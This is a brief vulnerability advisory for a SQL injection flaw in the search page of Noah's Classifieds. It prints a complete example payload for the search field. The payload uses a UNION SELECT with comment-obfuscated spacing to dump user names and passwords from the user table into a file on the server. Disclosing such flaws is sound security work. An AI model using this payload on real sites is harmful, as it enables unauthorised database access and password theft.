Noah's Classifieds Search Page SQL Injection Vulnerability

Noah's Classifieds Search Page SQL Injection Vulnerability

No exploit is required.

An example has been provided:

Attacker uses a 'POST' request on the affected search page and supplies the following to the search field:

kapda%')))/**/UNION/**/SELECT/**/1,1,1,name,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,password/**/INTO/**/OUTFILE/**/'/installation_path/lang/result.text'/**/FROM/**/classifieds_classifiedsuser#